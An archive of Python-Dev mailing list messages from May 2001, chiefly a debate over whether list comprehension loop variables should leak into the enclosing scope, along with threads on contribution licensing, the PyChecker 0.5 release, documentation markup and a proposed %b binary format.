Subject: [Python-Dev] Re: string repr in 2.1 (fwd)
References: <20010529115201.J676@xs4all.nl>
Message-ID: <3B141AB7.4C6DAFB6@ActiveState.com>

Thomas Wouters wrote:
> 
> Robin apparently ran into a real problem caused by the change in string
> repr() semantics. Now, arguably this is his own stupid fault <wink> (and
> indeed he argues that himself) but that doesn't mean we shouldn't take this
> into account. 

I think it is done now and it is better this way. The pain is over.
Reverting would hurt someone else again.

Displayhook should be used sparingly. One of the major virtues of the
REPL is that it behaves so much like standard Python.

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From tim@digicool.com  Tue May 29 23:54:01 2001
From: tim@digicool.com (Tim Peters)
Date: Tue, 29 May 2001 18:54:01 -0400
Subject: [Python-Dev] Re: Time for the yearly list.append() panic
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEKACAAA.tim@digicool.com>

FYI, I checked in a variation (listobject.c) over the weekend.

Win9x is ultimately hopeless, but we can grow a list there to about 35M
elements now instead of crapping out at < 2M, and it's zippy the whole way
until death.

Win2K (and I *assume* WinNT) benefit much more, as non-linear behavior was
obvious very early there.  Now it's flat and fast until physical RAM is
exhausted, and then it suffers looong (15-30 seconds) "hiccups" at resize
points.

Fred kindly confirmed that Linux isn't hurt.  Its behavior looks the same as
the new Win2K behavior, except that the Linux hiccups are much briefer
(although still obvious when they occur).

time-for-the-yearly-list.append()-celebration-ly y'rs  - tim


From PyChecker <pychecker@metaslash.com>  Wed May 30 03:49:45 2001
From: PyChecker <pychecker@metaslash.com> (Neal Norwitz)
Date: Tue, 29 May 2001 22:49:45 -0400
Subject: [Python-Dev] PyChecker v0.5 released
Message-ID: <3B145FC9.49813488@metaslash.com>

I was finally able to get version 0.5 out.  Just in case this is the
first time you are seeing this message, or you forgot what PyChecker is:

    PyChecker is a tool for finding common bugs in python source code.
    It finds problems that are typically caught by a compiler for less
    dynamic languages, like C and C++.  Because of the dynamic nature
    of python, some warnings may be incorrect; however,
    spurious warnings should be fairly infrequent.

The highlights are that code at the module scope is now checked.
There is still a problem with class variables and globals that are default
parameter values.  But other than that, there should be no more spurious
Variable unused warnings.

Code that makes PyChecker raise an exception should now be caught in most
cases and this produces a warning.  Please mail me if you find it blowing
up on your code.  The last line processed is shown in the warning, so
if you include some context, I can hopefully fix the problem.

Also, PyChecker should really use the files passed on the command line,
even if it uses the same module name internally.  So it will check your
warn.py, not PyChecker's warn.py.

Feedback, comments, criticisms, new ideas, better ideas, etc. are all 
greatly appreciated.  Thanks for everyone who has taken the time to mail me.
If you can think of common mistakes that are made that PyChecker doesn't
find, please let me know.

Here's the CHANGELOG:
  * Catch internal errors "gracefully" and turn into a warning
  * Add checking of most module scoped code
  * Add pychecker subdir to imports to prevent filename conflicts
  * Don't produce unused local variable warning if variable name == '_'
  * Add -g/--allglobals option to report all global warnings, not just first
  * Add -V/--varlist option to selectively ignore variable not used warnings
  * Add test script and expected results
  * Print all instructions when using debug (-d/--debug)
  * Overhaul internal stack handling so we can look for more problems
  * Fix glob'ing problems (all args after glob were ignored)
  * Fix spurious Base class __init__ not called
  * Fix exception on code like:  ['xxx'].index('xxx')
  * Fix exception on code like:  func(kw=(a < b))
  * Fix line numbers for import statements

PyChecker is available on Source Forge:
    Web page:           http://pychecker.sourceforge.net/
    Project page:       http://sourceforge.net/projects/pychecker/

Neal
--
pychecker@metaslash.com


From fdrake@cj42289-a.reston1.va.home.com  Wed May 30 06:31:01 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed, 30 May 2001 01:31:01 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update for development version of Python (2.2).

Mostly small updates, but I've worked on new markup for grammar
productions used in the Reference Manual.  Currently, only the lexical
productions in Chapter 2 of the manual have been converted to the new
markup and layout.  Please take a look and send comments to
doc-sig@python.org; the first page containing these changes is at:

    http://python.sourceforge.net/devel-docs/ref/identifiers.html

The changes needed to implement the markup have not been checked in
yet, and there are some bugs in the implementation (both for HTML and
PDF), but this should make the productions easier to navigate.

I've tested the HTML version on Linux only with Mozilla 0.9, Opera
5.0b8, and Netscape Navigator 4.77.  Navigator is definately lagging
behind in CSS support!

Also added Michel Pelletier's documentation for the HTMLParser module,
with some small changes.


From tim.one@home.com  Wed May 30 06:51:04 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 01:51:04 -0400
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>

[Fred Drake]
> The development version of the documentation has been updated:
>
> 	http://python.sourceforge.net/devel-docs/
>
> Incremental update for development version of Python (2.2).
>
> Mostly small updates, but I've worked on new markup for grammar
> productions used in the Reference Manual.  Currently, only the lexical
> productions in Chapter 2 of the manual have been converted to the new
> markup and layout.  Please take a look and send comments to
> doc-sig@python.org; the first page containing these changes is at:
>
>     http://python.sourceforge.net/devel-docs/ref/identifiers.html
>
> The changes needed to implement the markup have not been checked in
> yet, and there are some bugs in the implementation (both for HTML and
> PDF), but this should make the productions easier to navigate.

Let me suggest starting with

    http://python.sourceforge.net/devel-docs/ref/integers.html

instead, and clicking on "digit" in the "hexdigit" production.  The problem
with the originally suggested page is that all the links point into the same
paragraph, so "nothing happens" when you click one.  But "digit" was the
cause of a bogus bug report, as the submitter didn't realize "digit" had
been defined earlier in the docs, and without something like these mondo
cool new links it's almost impossible to find cross-section production
definitions.

Stumbled into one glitch:  nonzerodigit doesn't resolve correctly; the
node24.html page it refers to doesn't seem to exist.


From fdrake@acm.org  Wed May 30 06:53:23 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 01:53:23 -0400 (EDT)
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>
References: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
 <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>
Message-ID: <15124.35539.53551.52668@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > Stumbled into one glitch:  nonzerodigit doesn't resolve correctly; the
 > node24.html page it refers to doesn't seem to exist.

  That was the bug alluded to.  The digit* grouped with the
nonzerodigit also doesn't work, although the other two uses of digit
on that page (floating.html) work properly.  I'll investigate
tomorrow; just too tired tonight.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From tim.one@home.com  Wed May 30 08:47:47 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 03:47:47 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>

[David Beazley]
> ...
> However, I've also been shooting myself in the foot a little more
> than usual
> ...
> Because of this, I have frequently found myself debugging the
> following programming error:

If "frequently" is "a little more than usual", then it sounds like your
problems in all areas are too common for us to really help you by fixing
this one <wink>.

OK, I'm afraid the behavior follows from taking seriously the idea that
listcomps are syntactic sugar for a specific pattern of nested loops and
"if" tests.  That was done to make it explainable, and the correspondence is
indeed exact.  The implementation already creates "invisible" names:

>>> [repr(name) for name in globals().keys()]
["'__builtins__'", "'__name__'", "'name'", "'__doc__'", "'_[1]'"]
>>>

Where did "_[1]" come from?  You guessed it.  Look for it after the listcomp
finishes and it's gone:

>> globals().keys()
'__builtins__', '__name__', 'name', '__doc__']
>>

It's invisible because it's a temp var you *wouldn't* see in the equivalent
loop nest.

> ...
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner

I'm not sure it's worth losing the exact correspondence with nested loops;
or that it's not worth it either.  Note that "the iterator variables"
needn't be bare names:

>>> class x:
...     pass
...
>>> [1 for x.i in range(3)]
[1, 1, 1]
>>> x.i
2
>>>

This complicates explaining exactly how you want to deviate from the
for-loop model.  So, I think, does this:

>>> [i for i in range(2) for i in range(2, 5)]
[2, 3, 4, 2, 3, 4]
>>>

That is, even in simple cases, is the desired scope attached to the "for" or
to the "[]"?  Python doesn't have a problem with reusing a name as a for
target in nested loops (or in listcomps today).

> ...
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

Not even in a debugger, when the operation has completed via unexpected
exception, and you're desperate to know what the control vrbl was bound to
at the time of death?  Or in an exception handler?

>>> import sys
>>> try:
...     [i*i for i in xrange(sys.maxint)]
... except OverflowError:
...     raise OverflowError("oops! blew up at %d" % i)
...
Traceback (most recent call last):
  File "<stdin>", line 4, in ?
OverflowError: oops! blew up at 46341
>>>

Or what about:

i = 12
def f():
    print i
    return [i for i in range(i)]
f()

1. Should "print i" print 12, or raise UnboundLocalError?

2. Does the "i" in "range(i)" refer to the global i, or is that just
   senseless?

So long as the for-loop model is followed faithfully, nothing is hard to
explain or predict, and simply because there's nothing truly new.

> I was actually quite surprised with this behavior the first time I saw
> it.

Me too <wink>.

> I suspect most other programmers would not anticipate this side
> effect either.

I share the suspicion, but am not sure why:  "for" is a binding construct in
Python, so being surprised by "for" binding a name is itself surprising.

Another principled model is possible, where

    [f(i) for i in whatever]

is treated like

    (lambda: [f(i) for i in whatever])()

>>> i = 12
>>> (lambda: [i**2 for i in range(4)])()
[0, 1, 4, 9]
>>> i
12
>>>

That's more like Haskell does it.  But the day we explain a Python construct
in terms of a lambda transformation is the day Guido kills all of us <wink>.


From esr@thyrsus.com  Wed May 30 09:00:56 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 04:00:56 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 03:47:47AM -0400
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
Message-ID: <20010530040056.A27662@thyrsus.com>

Tim Peters <tim.one@home.com>:
> That's more like Haskell does it.  But the day we explain a Python construct
> in terms of a lambda transformation is the day Guido kills all of us <wink>.

They'll get *my* lambdas when they pry them from my cold, dead fingers <wink>,
but I find I don't have a strong opinion about how the scoping should work.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"Experience should teach us to be most on our guard to protect liberty
when the government's purposes are beneficient...  The greatest dangers
to liberty lurk in insidious encroachment by men of zeal, well meaning
but without understanding."
	-- Supreme Court Justice Louis Brandeis


From thomas@xs4all.net  Wed May 30 12:14:24 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Wed, 30 May 2001 13:14:24 +0200
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <E15525f-0003AG-00@usw-sf-web1.sourceforge.net>; from noreply@sourceforge.net on Wed, May 30, 2001 at 02:16:31AM -0700
References: <E15525f-0003AG-00@usw-sf-web1.sourceforge.net>
Message-ID: <20010530131424.Y690@xs4all.nl>

On Wed, May 30, 2001 at 02:16:31AM -0700, noreply@sourceforge.net wrote:

> OK, I'm un-withdrawing this patch.  Just had to get things
> straight with our lawyer. The patch is released under the
> following license (the X11 license with 4 extra paragraphs
> of disclaimers :):
> http://www.zoteca.com/opensource/LICENSE.txt

This raises an interesting point. Do we want separate pieces of the Python
distribution to have separate licences ? I'd point out that the zoteca
licence isn't mentioned on the OSI site as an Approved Licence, and that the
licence contains a copyright notice, but no clear statement whether it's
allowed to copy the licence other than together with the piece of software
it's distributed with.

The easiest solution would of course be for Itamar to get his boss/lawyers
to give us the right to relicence it under the PSF licence :)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From jack@oratrix.nl  Wed May 30 13:26:39 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Wed, 30 May 2001 14:26:39 +0200
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class
 for threading
In-Reply-To: Message by Thomas Wouters <thomas@xs4all.net> ,
 Wed, 30 May 2001 13:14:24 +0200 , <20010530131424.Y690@xs4all.nl>
Message-ID: <20010530122702.F3FE53B8999@snelboot.oratrix.nl>

> On Wed, May 30, 2001 at 02:16:31AM -0700, noreply@sourceforge.net wrote:
> 
> > OK, I'm un-withdrawing this patch.  Just had to get things
> > straight with our lawyer. The patch is released under the
> > following license (the X11 license with 4 extra paragraphs
> > of disclaimers :):
> > http://www.zoteca.com/opensource/LICENSE.txt
>
> [...]
>
> The easiest solution would of course be for Itamar to get his boss/lawyers
> to give us the right to relicence it under the PSF licence :)

I think this is the only viable solution. If various parts of Python have 
different license agreements this may well be a reason for people not to use 
Python because the hassle of figuring out which pieces fit their own licensing 
policy.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From beazley@cs.uchicago.edu  Wed May 30 14:49:29 2001
From: beazley@cs.uchicago.edu (David Beazley)
Date: Wed, 30 May 2001 08:49:29 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
 <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
Message-ID: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>

Tim Peters writes:
 > > Because of this, I have frequently found myself debugging the
 > > following programming error:
 > 
 > If "frequently" is "a little more than usual", then it sounds like your
 > problems in all areas are too common for us to really help you by fixing
 > this one <wink>.

I've probably been bitten by this about 5-10 times over the last few
months. I can also say that it's a real bugger to track down when it
happens.  Now while this may just be a user problem on my part (which
I can accept), I think there is a much deeper semantic problem with
the current implementation of list comprehensions.  Specifically, we
now have this really cool list construction technique that is, for all
practical purposes, an operator.  Yet, at the same time, this
"operator" has a really nasty side-effect of changing the values of
variables in the surrounding scope in a very unnatural and unexpected
way.

More generally, it's essentially the same behavior that you would get
if you wrote some code like this:

    a = expr(x,y)

and expr() went off and nuked the value of x, replacing it with
something completely different (note: I'm not talking about cases
where x might be mutable here).  Since you can write things like this

    a = [ 2*x for x in s]

it's easy to view the right hand side as being isolated in the same
way as a normal expression (where the name of the iteration variable
"x" is incidental--a throwaway if you will).

Maybe everyone else views list comprehensions as a series of
statements (the syntactic sugar for nested for-loop idea).  However,
if you look at how they can be used, it's completely different than
this.  Specifically, if I write something like this:

   a = [2*x for x in s] + [3*x for x in t]

I certainly don't conceptualize it as being literally expanded into
the following sequence of statements:

   t1 = [ ]
   for x in s:
      t1.append(2*x)
   t2 = [ ]
   for x in t:
      t2.append(3*x)
   a = t1 + t2

 > 
 > I'm not sure it's worth losing the exact correspondence with nested loops;
 > or that it's not worth it either.  Note that "the iterator variables"
 > needn't be bare names:
 > 
 > >>> class x:
 > ...     pass
 > ...
 > >>> [1 for x.i in range(3)]
 > [1, 1, 1]
 > >>> x.i
 > 2
 > >>>
 > 

Hmmm. I didn't realize that you could even do this.    Yes, this would
definitely present a problem.   However, if list comprehensions were
modified not to assign any names in the current scope, it still
seems like this would work (in this case, "x" is already defined and
"x.i" is not creating a new name, but is setting an attribute on
something else).   Couldn't nested scopes be used to implement this
in some manner?

 > > ...
 > > Just as an aside, I have never intentionally used the iterator
 > > variable of a list comprehension after the operation has completed.
 > 
 > Not even in a debugger, when the operation has completed via unexpected
 > exception, and you're desperate to know what the control vrbl was bound to
 > at the time of death?  Or in an exception handler?
 > 

Nope.  I don't make programming mistakes---well, other than this one,
and well, all of those other ones :-).

 > Another principled model is possible, where
 > 
 >     [f(i) for i in whatever]
 > 
 > is treated like
 > 
 >     (lambda: [f(i) for i in whatever])()
 > 
 > >>> i = 12
 > >>> (lambda: [i**2 for i in range(4)])()
 > [0, 1, 4, 9]
 > >>> i
 > 12
 > >>>
 > 
 > That's more like Haskell does it.  But the day we explain a Python construct
 > in terms of a lambda transformation is the day Guido kills all of us <wink>.

Ah yes, well this is exactly the kind of behavior that seems most
natural to me.   It's also the behavior that everyone expected went I
went around to the various Python hackers in the department and asked
them about it yesterday.

I suppose I could just write this:

  a = (lambda s: [2*i for i in s])(s)

However, that's pretty ugly.

In any case, I'm mostly just curious if anyone else has been bitten by
the problem I've described.  I would certainly love to see a fix for
it (I would even volunteer to work on a prototype implementation if
there is interest). On the other hand, if no changes are deemed
necessary, we should at least try to better emphasize this behavior in the
documentation--perhaps encouraging people to use private names.  For
example:

   a = [_i*2 for _i in t]
   
(although, I have to say that this just looks like a gross hack--I'd
rather not have to resort to doing this).

Cheers,

Dave


From fdrake@acm.org  Wed May 30 15:03:13 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 10:03:13 -0400 (EDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
 <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
 <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>

David Beazley writes:
 > Maybe everyone else views list comprehensions as a series of
 > statements (the syntactic sugar for nested for-loop idea).  However,

  I certainly don't.  I know that that was used as part of the design
consideration, but it's not at all clear to me that this is
desirable.
  If I see code like this:

        x = 42
        L = [x**2 for x in range(2000)]
        print x

I think it should map to something like this from C++:

        int x = 42;
        int L[2000];

        for (int x = 0; x < 2000; ++x) {
            L[x] = x * x;
        }
        printf("%d\n", x);

i.e., both *should* print "42\n" on standard output.

Tim sez:
 > I'm not sure it's worth losing the exact correspondence with nested loops;
 > or that it's not worth it either.  Note that "the iterator variables"
 > needn't be bare names:
 > 
 > >>> class x:
 > ...     pass
 > ...
 > >>> [1 for x.i in range(3)]
 > [1, 1, 1]
 > >>> x.i
 > 2

David:
 > Hmmm. I didn't realize that you could even do this.    Yes, this would
 > definitely present a problem.   However, if list comprehensions were

  I didn't realize this either.  I'm quite surprised by it, in fact,
though I understand (I think) why it works that way.  But was this
intentional?  It seems like pure evil to me!  I'd only expect it to
support bare names and sequence unpacking (with only bare names at the
"edge" of all nested unpackings).


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From gward@python.net  Wed May 30 15:36:30 2001
From: gward@python.net (Greg Ward)
Date: Wed, 30 May 2001 10:36:30 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Wed, May 30, 2001 at 08:49:29AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <20010530103630.B11580@gerg.ca>

On 30 May 2001, David Beazley said:
> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.

For the record, I have not been bitten by this, but I probably don't use
list comps as much as you do.

I can completely sympathize with both your and Tim's point of view
here.  Both make perfect sense at the same time.  Hmmm.

"Do I contradict myself?
 Very well then I contradict myself,
 (I am large, I contain multitudes)"

        Greg
-- 
Greg Ward - Unix nerd                                   gward@python.net
http://starship.python.net/~gward/
Money is a powerful aphrodisiac.  But flowers work almost as well.


From barry@digicool.com  Wed May 30 16:07:12 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 11:07:12 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class
 for threading
References: <thomas@xs4all.net>
 <20010530131424.Y690@xs4all.nl>
 <20010530122702.F3FE53B8999@snelboot.oratrix.nl>
Message-ID: <15125.3232.925401.563151@anthem.wooz.org>

>>>>> "TW" == Thomas Wouters <thomas@xs4all.net> writes:

    TW> The easiest solution would of course be for Itamar to get his
    TW> boss/lawyers to give us the right to relicence it under the
    TW> PSF licence :)

>>>>> "JJ" == Jack Jansen <jack@oratrix.nl> writes:

    JJ> I think this is the only viable solution. If various parts of
    JJ> Python have different license agreements this may well be a
    JJ> reason for people not to use Python because the hassle of
    JJ> figuring out which pieces fit their own licensing policy.

I completely agree.  IMO, the most important job of the PSF is to make
the Python IP sane again.  That means clearing as much of the existing
rights as possible, and releasing it under the NAIPL (New And Improved
Python License).  Any code that is licensed differently could mean
that it'll be ripped out of some re-distributions.  I'd be less
concerned about some ancillary module that few people use, and much
more concerned about some core piece of the code.

-Barry


From mal@lemburg.com  Wed May 30 20:57:17 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 30 May 2001 21:57:17 +0200
Subject: [Python-Dev] Autoconf problems on BeOS
Message-ID: <3B15509D.C790D5DF@lemburg.com>

I have a bug report assigned to myself which really is more
about autoconf than Unicode. The problem is that the
SIZEOF_xxx tests cause the Metroworks compiler on BeOS to
fail and this again causes these defines to be set to 0 !

Could someone with more autoconf experience please have a look ?

https://sourceforge.net/tracker/?func=detail&aid=420416&group_id=5470&atid=105470

Thanks,
-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one@home.com  Wed May 30 21:07:37 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 16:07:37 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEGOKFAA.tim.one@home.com>

[Tim]
> Note that "the iterator variables" needn't be bare names:

[Fred]
>   I didn't realize this either.

You have to get your head out of the docs and read more code <wink>.

> I'm quite surprised by it, in fact, though I understand (I think) why
> it works that way.  But was this intentional?

I expect so.

> It seems like pure evil to me!

Sometimes it's the bee's knees; for example,

>>> digits = range(3)
>>> x = [None] * 3
>>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits]
>>> base3
[[0, 0, 0], [0, 0, 1], [0, 0, 2],
 [0, 1, 0], [0, 1, 1], [0, 1, 2],
 [0, 2, 0], [0, 2, 1], [0, 2, 2],
 [1, 0, 0], [1, 0, 1], [1, 0, 2],
 [1, 1, 0], [1, 1, 1], [1, 1, 2],
 [1, 2, 0], [1, 2, 1], [1, 2, 2],
 [2, 0, 0], [2, 0, 1], [2, 0, 2],
 [2, 1, 0], [2, 1, 1], [2, 1, 2],
 [2, 2, 0], [2, 2, 1], [2, 2, 2]]
>>>

I've done stuff "like that" often, albeit via the nested-loop spelling.

> I'd only expect it to support bare names and sequence unpacking (with
> only bare names at the "edge" of all nested unpackings).

It's too late to take it away now!  Python always worked this way.  And it's
really got nothing to do with what implementing what David wants (e.g., the
lambda transformation I mentioned preserves its semantics) -- apart from (I
hope) driving home that changes need to be considered very carefully.


From tim.one@home.com  Wed May 30 21:22:19 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 16:22:19 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEGPKFAA.tim.one@home.com>

[David Beazley, pretty much repeats why he doesn't like the current scheme]

I hoped it was clear the first time I was at least half sympathetic!  If it
wasn't, I am <wink>.

>> >>> i = 12
>> >>> (lambda: [i**2 for i in range(4)])()
>> [0, 1, 4, 9]
>> >>> i
>> 12
>> >>>
>>
>> That's more like Haskell does it.

> Ah yes, well this is exactly the kind of behavior that seems most
> natural to me.   It's also the behavior that everyone expected went I
> went around to the various Python hackers in the department and asked
> them about it yesterday.

I believe that.

> I suppose I could just write this:
>
>   a = (lambda s: [2*i for i in s])(s)
>
> However, that's pretty ugly.

It's too complicated, isn't it?  In the presence of nested scopes (which are
reality in 2.2),

    a = (lambda: [2*i for i in s])()

does the same thing and is conceptually clearer.  I'm not suggesting that
you actually write that, but view it as a *model* for your intended
semantics.  I wouldn't want to see the implementation actually use a lambda
under the covers, either, but we need some crisp way to explain the intent.
Note that the lambda-trick *model* "does the right thing" for for-loop
targets like x.i and x[i] too.

> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.  I would certainly love to see a fix for
> it (I would even volunteer to work on a prototype implementation if
> there is interest).

I encourage that, but since it's not 100% backward-compatible you'll enjoy
the usual range of hysterical <wink> opposition.  Needs a PEP, and possibly
even an associated future-statement.  Overall, I'm more in favor of changing
it than not.


From skip@pobox.com (Skip Montanaro)  Wed May 30 21:48:47 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Wed, 30 May 2001 15:48:47 -0500
Subject: [Python-Dev] scoping and list comprehensions
Message-ID: <15125.23727.168431.762320@beluga.mojam.com>

Regarding the issue of how list comprehensions should relate to their
environment, perhaps instead of modifying list comprehensions to make them
execute in new local scopes (or at least appear to) a better solution would
be to allow a new local scope to be introduced inline, sort of like in C:

    {
        int i;
	for (i=0; i < 10; i++) {
            dostuffwith(i);
	}
    }

While this might be used more for list comprehensions than other constructs,
I'm sure people will find a way to (ab)use it for other things as well.  I
don't see an obvious way of adding such functionality to Python without
introducing a new keyword though, which is going to make it difficult to get
past Guido:

    l = []
    scope:
        l = [i**2 for i in range(10)]
    print l

Hmmm, wait a minute, what if you terminated a block introducer (if or while
clause or try/except clauses) with something other than a colon?  (I'm just
thinking out loud, I don't think this is necessarily a good solution).

    if 1:		# no new scope introduced
        l = [i**2 for i in range(10)]
    print l

vs.

    if 1;		# new scope introduced for enclosed block
        l = [i**2 for i in range(10)]
    print l

That certainly has some line noise qualities about it, especially since
colons and semicolons are visually so similar, but does offer an alternative
to introducing a new keyword into the language.

Hmmm, wait another minute, perhaps you could simply overload def:

    l = []
    def:
        l = [i**2 for i in range(10)]
    print l

There's also the problem of how to export results from the scope, though
perhaps the new nested scope stuff provides a solution to that.  (I've
ignored them so far, so I can't tell...)

Would it be possible for the compiler to recognize the degenerate def: and
simply mangle any names that would clash instead of introducing an actual
new execution frame?  The above might be equivalent to

    l = []
    l = [__mangled_i**2 for __mangled_i in range(10)]
    print l

if 'i' already existed in the same scope.

Just thinking out loud.  I'm not sure any of these ideas is any better than
the current state of affairs.

Skip


From Greg.Wilson@baltimore.com  Wed May 30 22:11:16 2001
From: Greg.Wilson@baltimore.com (Greg Wilson)
Date: Wed, 30 May 2001 17:11:16 -0400
Subject: [Python-Dev] %b format?
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>

I would like to add a "%b" format for converting
numbers to binary format (1's and 0's).  I realize
this isn't a C-ism, but it would be very useful for
teaching purposes, as newcomers find 101101 a lot
easier to understand than 0x2D.

Reactions?

Greg


-----------------------------------------------------------------------------------------------------------------
The information contained in this message is confidential and is intended 
for the addressee(s) only.  If you have received this message in error or 
there are any problems please notify the originator immediately.  The 
unauthorized use, disclosure, copying or alteration of this message is 
strictly forbidden. Baltimore Technologies plc will not be liable for direct, 
special, indirect or consequential damages arising from alteration of the 
contents of this message by a third party or as a result of any virus being 
passed on.

In addition, certain Marketing collateral may be added from time to time to 
promote Baltimore Technologies products, services, Global e-Security or 
appearance at trade shows and conferences.
 
This footnote confirms that this email message has been swept by 
Baltimore MIMEsweeper for Content Security threats, including
computer viruses.


From esr@thyrsus.com  Wed May 30 22:28:38 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:28:38 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>; from Greg.Wilson@baltimore.com on Wed, May 30, 2001 at 05:11:16PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>
Message-ID: <20010530172838.A778@thyrsus.com>

Greg Wilson <Greg.Wilson@baltimore.com>:
> I would like to add a "%b" format for converting
> numbers to binary format (1's and 0's).  I realize
> this isn't a C-ism, but it would be very useful for
> teaching purposes, as newcomers find 101101 a lot
> easier to understand than 0x2D.
> 
> Reactions?

+1.  Didactically pretty useful, and the additional code won't boost
global complexity much.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Where rights secured by the Constitution are involved, there can be no
rule making or legislation which would abrogate them.
        -- Miranda vs. Arizona, 384 US 436 p. 491


From tim.one@home.com  Wed May 30 22:30:49 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 17:30:49 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <20010530131424.Y690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>

[Thomas Wouters]
> This raises an interesting point. Do we want separate pieces of the
> Python distribution to have separate licences ?

This is a question for the PSF to resolve, since the PSF is intended to
become the sole legal owner of Python's IP rights.

My position will be that nothing ships in the distribution unless copyright
has been assigned to the PSF, or the contributor has agreed to give the PSF
a non-exclusive irrevocable etc license to release their work under the PSF
license du jour.  Fleshing out the second option so as to prevent abuse on
either side is going to require significant effort ("what if the PSF goes
away?", "what if the PSF changes its license to something I hate?", "what if
I change my mind?", etc).

